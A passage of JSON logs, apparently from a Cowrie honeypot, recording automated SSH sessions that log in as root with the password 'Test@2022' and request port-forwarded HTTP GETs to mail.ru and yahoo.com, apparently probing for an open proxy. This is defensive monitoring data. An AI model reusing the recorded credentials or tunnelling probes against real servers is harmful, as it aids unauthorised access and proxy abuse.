c","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.498980Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.745744Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27282,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27282","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.796287Z","session":"ae3eeb7d7742"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.845822Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2743,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2743","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.987894Z","session":"ae3eeb7d7742"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.038250Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":1549,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1549","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.179886Z","session":"ae3eeb7d7742"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.229563Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.279826Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21662,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4d2e940dd76","protocol":"ssh","message":"New connection: 77.83.207.83:21662 (1.2.3.4:22) [session: c4d2e940dd76]","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.329789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.330914Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.381024Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.631872Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16084,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16084","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.682763Z","session":"c4d2e940dd76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.732901Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":13090,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:13090","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.876353Z","session":"c4d2e940dd76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:11.926379Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":18998,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18998","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.068622Z","session":"c4d2e940dd76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.119095Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.170166Z","src_ip":"77.83.207.83","session":"c4d2e940dd76"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21749,"dst_ip":"1.2.3.4","dst_port":22,"session":"e97dabf830f1","protocol":"ssh","message":"New connection: 77.83.207.83:21749 (1.2.3.4:22) [session: e97dabf830f1]","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.218616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.219287Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.269156Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.517663Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":333,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:333","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.568687Z","session":"e97dabf830f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.618715Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":7252,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7252","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.760212Z","session":"e97dabf830f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.810203Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24807,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24807","sensor":"my-vps","timestamp":"2025-08-31T03:51:12.952332Z","session":"e97dabf830f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.002646Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.054238Z","src_ip":"77.83.207.83","session":"e97dabf830f1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21859,"dst_ip":"1.2.3.4","dst_port":22,"session":"4616bc6faf0b","protocol":"ssh","message":"New connection: 77.83.207.83:21859 (1.2.3.4:22) [session: 4616bc6faf0b]","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.102773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.103490Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.153292Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.401691Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22136,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22136","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.452411Z","session":"4616bc6faf0b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.502506Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":7325,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7325","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.644143Z","session":"4616bc6faf0b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.694026Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12495,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12495","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.836137Z","session":"4616bc6faf0b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.886080Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.session.closed","duration":12.759039640426636,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.905957Z","src_ip":"212.227.235.229","session":"60ac12623e10"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.936451Z","src_ip":"77.83.207.83","session":"4616bc6faf0b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21961,"dst_ip":"1.2.3.4","dst_port":22,"session":"54aa934f7b4a","protocol":"ssh","message":"New connection: 77.83.207.83:21961 (1.2.3.4:22) [session: 54aa934f7b4a]","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.986317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:13.987248Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.037568Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55458,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2e379afb6de","protocol":"telnet","message":"New connection: 212.227.235.229:55458 (1.2.3.4:23) [session: c2e379afb6de]","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.130982Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.290431Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1825,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1825","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.341839Z","session":"54aa934f7b4a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.392419Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":13756,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13756","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.537099Z","session":"54aa934f7b4a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.587521Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":12575,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12575","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.728948Z","session":"54aa934f7b4a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.779548Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.830617Z","src_ip":"77.83.207.83","session":"54aa934f7b4a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22075,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcaa8f036d06","protocol":"ssh","message":"New connection: 77.83.207.83:22075 (1.2.3.4:22) [session: fcaa8f036d06]","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.879282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.880222Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
